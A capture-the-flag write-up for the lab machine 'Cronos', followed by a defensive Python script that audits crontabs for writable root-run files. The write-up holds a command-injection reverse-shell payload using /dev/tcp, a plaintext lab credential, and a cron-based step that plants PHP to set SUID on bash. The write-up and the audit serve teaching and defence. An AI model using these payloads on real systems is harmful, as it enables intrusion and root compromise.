Cronos

Operating system | Difficulty | Release date | Creator |
---|---|---|---|
Linux | Medium | 22 March 2017 | ch4p |
Port scan
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 22:00 -03
Initiating SYN Stealth Scan at 22:00
Scanning 10.10.10.13 [65535 ports]
Discovered open port 80/tcp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 22/tcp on 10.10.10.13
Completed SYN Stealth Scan at 22:00, 17.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.13
Host is up, received user-set (0.17s latency).
Scanned at 2025-04-07 22:00:04 -03 for 17s
Not shown: 63385 closed tcp ports (reset), 2147 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
53/tcp open domain syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.17 seconds
Raw packets sent: 83224 (3.662MB) | Rcvd: 65061 (2.602MB)
Version and service enumeration
nmap -sCV -p22,53,80 -oN servicesScan 10.10.10.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 22:00 -03
Nmap scan report for 10.10.10.13 (10.10.10.13)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.94 seconds
Initial exploitation
root@kali:/home/d4redevil/htb/Cronos/nmap# whatweb 10.10.10.13
http://10.10.10.13 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.13], Title[Apache2 Ubuntu Default Page: It works]
echo "10.10.10.13 cronos.htb" >> /etc/hosts
echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts
Reverse Shell
10.10.14.5;bash -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
admin:kEjdbRigfBHUREiNSDs
Privilege escalation to root/SYSTEM
We have write access to the artisan binary, which we own. This binary is executed every minute by a cron job running as the root user.
To escalate privileges, we simply add to artisan's code a small PHP script that sets the SUID bit on bash.
<?php
system('chmod u+s /bin/bash');
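
A defender's check for the misconfiguration described above, as an added example that is not part of the original write-up: it reads a system crontab in `/etc/crontab` format and reports files run by root's entries that another account could modify. The function names, the sample crontab and the temporary paths are constructed for illustration.

```python
import os
import shlex
import stat
import tempfile

def weak_reason(path, trusted_uid=0):
    """Say why an account other than trusted_uid could modify path, or return None."""
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None

def audit_crontab(text, trusted_uid=0):
    """Return (path, reason) for regular files named in root's entries of a
    system crontab (five time fields, user, command)."""
    findings = []
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or line.lstrip().startswith("#") or fields[5] != "root":
            continue
        try:
            tokens = shlex.split(fields[6])
        except ValueError:  # unbalanced quotes: fall back to a whitespace split
            tokens = fields[6].split()
        for tok in tokens:
            # isfile() skips interpreters found via PATH, redirects and /dev/null
            if tok.startswith("/") and os.path.isfile(tok):
                reason = weak_reason(tok, trusted_uid)
                if reason:
                    findings.append((tok, reason))
    return findings

def demo():
    """Constructed sample: one group-writable script and one locked-down script."""
    d = tempfile.mkdtemp()
    artisan, backup = os.path.join(d, "artisan"), os.path.join(d, "backup.sh")
    for path, mode in ((artisan, 0o664), (backup, 0o755)):
        with open(path, "w") as fh:
            fh.write("# constructed\n")
        os.chmod(path, mode)
    crontab = (
        "# m h dom mon dow user command (constructed sample)\n"
        f"* * * * * root php {artisan} schedule:run >> /dev/null 2>&1\n"
        f"0 3 * * * root {backup}\n"
        f"*/5 * * * * www-data php {artisan} queue:work\n"
    )
    # trusted_uid is the current uid so the demo gives the same result without root
    return audit_crontab(crontab, trusted_uid=os.getuid()), artisan
```

On a real host, pass the contents of `/etc/crontab` and the files under `/etc/cron.d` with the default `trusted_uid=0`. A finding is fixed by making the file root-owned with no group or world write bit, or by running the job as the file's owner instead of root.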